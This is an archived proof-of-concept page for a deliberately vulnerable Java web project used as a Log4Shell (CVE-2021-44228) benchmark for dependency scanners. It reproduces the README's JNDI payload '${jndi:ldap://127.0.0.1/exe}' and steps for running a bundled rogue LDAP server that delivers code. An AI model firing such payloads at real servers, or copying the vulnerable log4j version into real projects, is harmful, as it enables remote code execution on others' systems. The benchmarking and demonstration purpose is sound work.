Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-44228 PoC — Apache Log4j 代码问题漏洞

Source
https://github.com/scabench/l4j-tp1
Associated Vulnerability
Title:Apache Log4j 代码问题漏洞 (CVE-2021-44228)
Description:Apache Log4j是美国阿帕奇(Apache)基金会的一款基于Java的开源日志记录工具。 Apache Log4J 存在代码问题漏洞,攻击者可设计一个数据请求发送给使用 Apache Log4j工具的服务器,当该请求被打印成日志时就会触发远程代码执行。
Description
jee web project with log4shell (CVE-2021-44228) vulnerability
Readme
## log4shell true positive

This is a simple web project with a log4shell vulnerability. 
The project defines a simple `scabench.HelloWorldService` get service returning a plain text string `hello world`.
The service does not expect parameters, and if parameters are encountered, an error 
is logged. 

The vulnerable dependency is [org.apache.logging.log4j:log4j-core:2.14.1](https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-core/2.14.1), the vulnerability is [CVE-2021-44228](https://nvd.nist.gov/vuln/detail/CVE-2021-44228). 


### Demonstrating the Vulnerability using a Test 

This requires unix or macos. It is easy to port this project to windows. 

A unit test is provided to demonstrate the vulnerability. The test requires a ldap server providing vulnerable code, the respective executable is provided by the project, it is defined in a separate project [https://github.com/jensdietrich/Log4J-RCE-Proof-Of-Concept](https://github.com/jensdietrich/Log4J-RCE-Proof-Of-Concept) based on [https://github.com/HyCraftHD/Log4J-RCE-Proof-Of-Concept](https://github.com/HyCraftHD/Log4J-RCE-Proof-Of-Concept).
The test fixture will handle startup and shutdown of the ldap server.

The test will create a file `foo` based on a command encoded embedded in the code of the ldap server the log4j connects to
(`touch foo`). This server can be controlled by an attacker. 

To run the test build the project with `mvn test`.

### Demonstrating the Vulnerability running the Application

1. start the embedded web server: `mvn jetty:run`
2. start the included the ldap server: `java -jar dodgy-ldap-server.jar` (the vulnerable copde will download Java code from this server)
3. point the browser to `http://localhost:8080/`, this site contains a pre-populated form with a malicious payload `${jndi:ldap://127.0.0.1/exe}`
4. submit this form
5. this will create a file `foo` on the server

### Running Software Composition Analyses

There are several sh scripts to run different analyses, result resports can be found in `scan-results`.

### Generating the SBOM

The `pom.xml` has a plugin to generate a [SBOM](https://www.cisa.gov/sbom) in [CycloneDX](https://cyclonedx.org/) format. 
To do this, run `mvn cyclonedx:makePackageBom`, the SBOM can be found in 
`target/` in `json` and `xml` format.
File Snapshot

 [4.0K]  /data/pocs/a5969ee70e825ce1c86e9d312ec7040ba76313d5
├── [1.8M]  dodgy-ldap-server.jar
├── [ 11K]  LICENSE
├── [4.2K]  pom.xml
├── [2.3K]  README.md
├── [ 452]  run-owasp.sh
├── [ 261]  run-snyk.sh
├── [4.0K]  scan-results
│   ├── [4.0K]  dependency-check
│   │   └── [156K]  dependency-check-report.json
│   └── [4.0K]  snyk
│       └── [ 27K]  snyk-report.json
└── [4.0K]  src
    ├── [4.0K]  main
    │   ├── [4.0K]  java
    │   │   └── [4.0K]  scabench
    │   │       └── [1.5K]  HelloWorldService.java
    │   └── [4.0K]  webapp
    │       └── [ 364]  index.html
    └── [4.0K]  test
        └── [4.0K]  java
            └── [4.0K]  scabench
                └── [1.9K]  Log4ShellTest.java

11 directories, 11 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.